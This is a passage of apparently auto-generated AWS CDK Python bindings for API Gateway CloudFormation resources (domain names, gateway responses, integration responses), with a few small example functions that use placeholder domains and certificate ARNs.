:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-certificatearn
"""
return self._values.get('certificate_arn')
@property
def endpoint_configuration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDomainName.EndpointConfigurationProperty"]]]:
"""``AWS::ApiGateway::DomainName.EndpointConfiguration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-endpointconfiguration
"""
return self._values.get('endpoint_configuration')
@property
def regional_certificate_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.RegionalCertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-regionalcertificatearn
"""
return self._values.get('regional_certificate_arn')
@property
def security_policy(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.SecurityPolicy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-securitypolicy
"""
return self._values.get('security_policy')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDomainNameProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
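# Illustrative sketch (not part of the generated bindings): a regional custom
# domain. For a REGIONAL endpoint the certificate goes in
# regional_certificate_arn (certificate_arn is used for EDGE endpoints). The
# domain name and ARN below are hypothetical placeholders.
def _example_domain_name(scope: aws_cdk.core.Construct) -> CfnDomainName:
    return CfnDomainName(
        scope, "ExampleDomain",
        domain_name="api.example.com",
        endpoint_configuration=CfnDomainName.EndpointConfigurationProperty(
            types=["REGIONAL"],
        ),
        regional_certificate_arn="arn:aws:acm:us-east-1:111122223333:certificate/example",
        security_policy="TLS_1_2",
    )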
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDomainNameV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDomainNameV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::DomainName
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, domain_name: str, domain_name_configurations: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "DomainNameConfigurationProperty"]]]]]=None, tags: typing.Any=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::DomainName``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param domain_name: ``AWS::ApiGatewayV2::DomainName.DomainName``.
:param domain_name_configurations: ``AWS::ApiGatewayV2::DomainName.DomainNameConfigurations``.
:param tags: ``AWS::ApiGatewayV2::DomainName.Tags``.
"""
props = CfnDomainNameV2Props(domain_name=domain_name, domain_name_configurations=domain_name_configurations, tags=tags)
jsii.create(CfnDomainNameV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="attrRegionalDomainName")
def attr_regional_domain_name(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RegionalDomainName
"""
return jsii.get(self, "attrRegionalDomainName")
@property
@jsii.member(jsii_name="attrRegionalHostedZoneId")
def attr_regional_hosted_zone_id(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RegionalHostedZoneId
"""
return jsii.get(self, "attrRegionalHostedZoneId")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGatewayV2::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""``AWS::ApiGatewayV2::DomainName.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-domainname
"""
return jsii.get(self, "domainName")
@domain_name.setter
def domain_name(self, value: str):
return jsii.set(self, "domainName", value)
@property
@jsii.member(jsii_name="domainNameConfigurations")
def domain_name_configurations(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "DomainNameConfigurationProperty"]]]]]:
"""``AWS::ApiGatewayV2::DomainName.DomainNameConfigurations``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-domainnameconfigurations
"""
return jsii.get(self, "domainNameConfigurations")
@domain_name_configurations.setter
def domain_name_configurations(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "DomainNameConfigurationProperty"]]]]]):
return jsii.set(self, "domainNameConfigurations", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDomainNameV2.DomainNameConfigurationProperty", jsii_struct_bases=[], name_mapping={'certificate_arn': 'certificateArn', 'certificate_name': 'certificateName', 'endpoint_type': 'endpointType'})
class DomainNameConfigurationProperty():
def __init__(self, *, certificate_arn: typing.Optional[str]=None, certificate_name: typing.Optional[str]=None, endpoint_type: typing.Optional[str]=None):
"""
:param certificate_arn: ``CfnDomainNameV2.DomainNameConfigurationProperty.CertificateArn``.
:param certificate_name: ``CfnDomainNameV2.DomainNameConfigurationProperty.CertificateName``.
:param endpoint_type: ``CfnDomainNameV2.DomainNameConfigurationProperty.EndpointType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-domainname-domainnameconfiguration.html
"""
self._values = {
}
if certificate_arn is not None: self._values["certificate_arn"] = certificate_arn
if certificate_name is not None: self._values["certificate_name"] = certificate_name
if endpoint_type is not None: self._values["endpoint_type"] = endpoint_type
@property
def certificate_arn(self) -> typing.Optional[str]:
"""``CfnDomainNameV2.DomainNameConfigurationProperty.CertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-domainname-domainnameconfiguration.html#cfn-apigatewayv2-domainname-domainnameconfiguration-certificatearn
"""
return self._values.get('certificate_arn')
@property
def certificate_name(self) -> typing.Optional[str]:
"""``CfnDomainNameV2.DomainNameConfigurationProperty.CertificateName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-domainname-domainnameconfiguration.html#cfn-apigatewayv2-domainname-domainnameconfiguration-certificatename
"""
return self._values.get('certificate_name')
@property
def endpoint_type(self) -> typing.Optional[str]:
"""``CfnDomainNameV2.DomainNameConfigurationProperty.EndpointType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-domainname-domainnameconfiguration.html#cfn-apigatewayv2-domainname-domainnameconfiguration-endpointtype
"""
return self._values.get('endpoint_type')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DomainNameConfigurationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDomainNameV2Props", jsii_struct_bases=[], name_mapping={'domain_name': 'domainName', 'domain_name_configurations': 'domainNameConfigurations', 'tags': 'tags'})
class CfnDomainNameV2Props():
def __init__(self, *, domain_name: str, domain_name_configurations: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnDomainNameV2.DomainNameConfigurationProperty"]]]]]=None, tags: typing.Any=None):
"""Properties for defining a ``AWS::ApiGatewayV2::DomainName``.
:param domain_name: ``AWS::ApiGatewayV2::DomainName.DomainName``.
:param domain_name_configurations: ``AWS::ApiGatewayV2::DomainName.DomainNameConfigurations``.
:param tags: ``AWS::ApiGatewayV2::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html
"""
self._values = {
'domain_name': domain_name,
}
if domain_name_configurations is not None: self._values["domain_name_configurations"] = domain_name_configurations
if tags is not None: self._values["tags"] = tags
@property
def domain_name(self) -> str:
"""``AWS::ApiGatewayV2::DomainName.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-domainname
"""
return self._values.get('domain_name')
@property
def domain_name_configurations(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnDomainNameV2.DomainNameConfigurationProperty"]]]]]:
"""``AWS::ApiGatewayV2::DomainName.DomainNameConfigurations``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-domainnameconfigurations
"""
return self._values.get('domain_name_configurations')
@property
def tags(self) -> typing.Any:
"""``AWS::ApiGatewayV2::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDomainNameV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
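# Illustrative sketch (not part of the generated bindings): the API Gateway V2
# flavour of a custom domain, where certificate details live in a list of
# DomainNameConfigurationProperty entries. All literals are hypothetical.
def _example_domain_name_v2(scope: aws_cdk.core.Construct) -> CfnDomainNameV2:
    return CfnDomainNameV2(
        scope, "ExampleDomainV2",
        domain_name="ws.example.com",
        domain_name_configurations=[
            CfnDomainNameV2.DomainNameConfigurationProperty(
                certificate_arn="arn:aws:acm:us-east-1:111122223333:certificate/example",
                endpoint_type="REGIONAL",
            )
        ],
    )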
@jsii.implements(aws_cdk.core.IInspectable)
class CfnGatewayResponse(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnGatewayResponse"):
"""A CloudFormation ``AWS::ApiGateway::GatewayResponse``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::GatewayResponse
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, response_type: str, rest_api_id: str, response_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, response_templates: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, status_code: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::GatewayResponse``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param response_type: ``AWS::ApiGateway::GatewayResponse.ResponseType``.
:param rest_api_id: ``AWS::ApiGateway::GatewayResponse.RestApiId``.
:param response_parameters: ``AWS::ApiGateway::GatewayResponse.ResponseParameters``.
:param response_templates: ``AWS::ApiGateway::GatewayResponse.ResponseTemplates``.
:param status_code: ``AWS::ApiGateway::GatewayResponse.StatusCode``.
"""
props = CfnGatewayResponseProps(response_type=response_type, rest_api_id=rest_api_id, response_parameters=response_parameters, response_templates=response_templates, status_code=status_code)
jsii.create(CfnGatewayResponse, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="responseType")
def response_type(self) -> str:
"""``AWS::ApiGateway::GatewayResponse.ResponseType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responsetype
"""
return jsii.get(self, "responseType")
@response_type.setter
def response_type(self, value: str):
return jsii.set(self, "responseType", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::GatewayResponse.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="responseParameters")
def response_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::GatewayResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responseparameters
"""
return jsii.get(self, "responseParameters")
@response_parameters.setter
def response_parameters(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "responseParameters", value)
@property
@jsii.member(jsii_name="responseTemplates")
def response_templates(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::GatewayResponse.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responsetemplates
"""
return jsii.get(self, "responseTemplates")
@response_templates.setter
def response_templates(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "responseTemplates", value)
@property
@jsii.member(jsii_name="statusCode")
def status_code(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::GatewayResponse.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-statuscode
"""
return jsii.get(self, "statusCode")
@status_code.setter
def status_code(self, value: typing.Optional[str]):
return jsii.set(self, "statusCode", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnGatewayResponseProps", jsii_struct_bases=[], name_mapping={'response_type': 'responseType', 'rest_api_id': 'restApiId', 'response_parameters': 'responseParameters', 'response_templates': 'responseTemplates', 'status_code': 'statusCode'})
class CfnGatewayResponseProps():
def __init__(self, *, response_type: str, rest_api_id: str, response_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, response_templates: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, status_code: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::GatewayResponse``.
:param response_type: ``AWS::ApiGateway::GatewayResponse.ResponseType``.
:param rest_api_id: ``AWS::ApiGateway::GatewayResponse.RestApiId``.
:param response_parameters: ``AWS::ApiGateway::GatewayResponse.ResponseParameters``.
:param response_templates: ``AWS::ApiGateway::GatewayResponse.ResponseTemplates``.
:param status_code: ``AWS::ApiGateway::GatewayResponse.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html
"""
self._values = {
'response_type': response_type,
'rest_api_id': rest_api_id,
}
if response_parameters is not None: self._values["response_parameters"] = response_parameters
if response_templates is not None: self._values["response_templates"] = response_templates
if status_code is not None: self._values["status_code"] = status_code
@property
def response_type(self) -> str:
"""``AWS::ApiGateway::GatewayResponse.ResponseType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responsetype
"""
return self._values.get('response_type')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::GatewayResponse.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-restapiid
"""
return self._values.get('rest_api_id')
@property
def response_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::GatewayResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responseparameters
"""
return self._values.get('response_parameters')
@property
def response_templates(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::GatewayResponse.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responsetemplates
"""
return self._values.get('response_templates')
@property
def status_code(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::GatewayResponse.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-statuscode
"""
return self._values.get('status_code')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnGatewayResponseProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
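# A short sketch of the value-object semantics of ``CfnGatewayResponseProps``:
# ``__eq__`` and ``__repr__`` are driven entirely by the captured ``_values``
# mapping, so two instances built from the same keywords compare equal. The
# rest-api id below is a placeholder.
def _gateway_response_props_are_value_objects() -> bool:
    a = CfnGatewayResponseProps(response_type="DEFAULT_5XX", rest_api_id="api-id-placeholder")
    b = CfnGatewayResponseProps(response_type="DEFAULT_5XX", rest_api_id="api-id-placeholder")
    # Omitted optional keys are simply absent from ``_values`` (and from repr()).
    return a == b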
@jsii.implements(aws_cdk.core.IInspectable)
class CfnIntegrationResponseV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnIntegrationResponseV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::IntegrationResponse``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::IntegrationResponse
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, integration_id: str, integration_response_key: str, content_handling_strategy: typing.Optional[str]=None, response_parameters: typing.Any=None, response_templates: typing.Any=None, template_selection_expression: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::IntegrationResponse``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param api_id: ``AWS::ApiGatewayV2::IntegrationResponse.ApiId``.
:param integration_id: ``AWS::ApiGatewayV2::IntegrationResponse.IntegrationId``.
:param integration_response_key: ``AWS::ApiGatewayV2::IntegrationResponse.IntegrationResponseKey``.
:param content_handling_strategy: ``AWS::ApiGatewayV2::IntegrationResponse.ContentHandlingStrategy``.
:param response_parameters: ``AWS::ApiGatewayV2::IntegrationResponse.ResponseParameters``.
:param response_templates: ``AWS::ApiGatewayV2::IntegrationResponse.ResponseTemplates``.
:param template_selection_expression: ``AWS::ApiGatewayV2::IntegrationResponse.TemplateSelectionExpression``.
"""
props = CfnIntegrationResponseV2Props(api_id=api_id, integration_id=integration_id, integration_response_key=integration_response_key, content_handling_strategy=content_handling_strategy, response_parameters=response_parameters, response_templates=response_templates, template_selection_expression=template_selection_expression)
jsii.create(CfnIntegrationResponseV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="integrationId")
def integration_id(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.IntegrationId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-integrationid
"""
return jsii.get(self, "integrationId")
@integration_id.setter
def integration_id(self, value: str):
return jsii.set(self, "integrationId", value)
@property
@jsii.member(jsii_name="integrationResponseKey")
def integration_response_key(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.IntegrationResponseKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-integrationresponsekey
"""
return jsii.get(self, "integrationResponseKey")
@integration_response_key.setter
def integration_response_key(self, value: str):
return jsii.set(self, "integrationResponseKey", value)
@property
@jsii.member(jsii_name="responseParameters")
def response_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::IntegrationResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-responseparameters
"""
return jsii.get(self, "responseParameters")
@response_parameters.setter
def response_parameters(self, value: typing.Any):
return jsii.set(self, "responseParameters", value)
@property
@jsii.member(jsii_name="responseTemplates")
def response_templates(self) -> typing.Any:
"""``AWS::ApiGatewayV2::IntegrationResponse.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-responsetemplates
"""
return jsii.get(self, "responseTemplates")
@response_templates.setter
def response_templates(self, value: typing.Any):
return jsii.set(self, "responseTemplates", value)
@property
@jsii.member(jsii_name="contentHandlingStrategy")
def content_handling_strategy(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::IntegrationResponse.ContentHandlingStrategy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-contenthandlingstrategy
"""
return jsii.get(self, "contentHandlingStrategy")
@content_handling_strategy.setter
def content_handling_strategy(self, value: typing.Optional[str]):
return jsii.set(self, "contentHandlingStrategy", value)
@property
@jsii.member(jsii_name="templateSelectionExpression")
def template_selection_expression(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::IntegrationResponse.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-templateselectionexpression
"""
return jsii.get(self, "templateSelectionExpression")
@template_selection_expression.setter
def template_selection_expression(self, value: typing.Optional[str]):
return jsii.set(self, "templateSelectionExpression", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnIntegrationResponseV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'integration_id': 'integrationId', 'integration_response_key': 'integrationResponseKey', 'content_handling_strategy': 'contentHandlingStrategy', 'response_parameters': 'responseParameters', 'response_templates': 'responseTemplates', 'template_selection_expression': 'templateSelectionExpression'})
class CfnIntegrationResponseV2Props():
def __init__(self, *, api_id: str, integration_id: str, integration_response_key: str, content_handling_strategy: typing.Optional[str]=None, response_parameters: typing.Any=None, response_templates: typing.Any=None, template_selection_expression: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::IntegrationResponse``.
:param api_id: ``AWS::ApiGatewayV2::IntegrationResponse.ApiId``.
:param integration_id: ``AWS::ApiGatewayV2::IntegrationResponse.IntegrationId``.
:param integration_response_key: ``AWS::ApiGatewayV2::IntegrationResponse.IntegrationResponseKey``.
:param content_handling_strategy: ``AWS::ApiGatewayV2::IntegrationResponse.ContentHandlingStrategy``.
:param response_parameters: ``AWS::ApiGatewayV2::IntegrationResponse.ResponseParameters``.
:param response_templates: ``AWS::ApiGatewayV2::IntegrationResponse.ResponseTemplates``.
:param template_selection_expression: ``AWS::ApiGatewayV2::IntegrationResponse.TemplateSelectionExpression``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html
"""
self._values = {
'api_id': api_id,
'integration_id': integration_id,
'integration_response_key': integration_response_key,
}
if content_handling_strategy is not None: self._values["content_handling_strategy"] = content_handling_strategy
if response_parameters is not None: self._values["response_parameters"] = response_parameters
if response_templates is not None: self._values["response_templates"] = response_templates
if template_selection_expression is not None: self._values["template_selection_expression"] = template_selection_expression
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-apiid
"""
return self._values.get('api_id')
@property
def integration_id(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.IntegrationId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-integrationid
"""
return self._values.get('integration_id')
@property
def integration_response_key(self) -> str:
"""``AWS::ApiGatewayV2::IntegrationResponse.IntegrationResponseKey``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-integrationresponsekey
"""
return self._values.get('integration_response_key')
@property
def content_handling_strategy(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::IntegrationResponse.ContentHandlingStrategy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-integrationresponse.html#cfn-apigatewayv2-integrationresponse-contenthandlingstrategy
"""
return self._values.get('content_handling_strategy')
@property
def response_parameters(self) -> typing.Any:
"""``AWS::ApiGatewayV2::IntegrationResponse.ResponseParameters``.
see
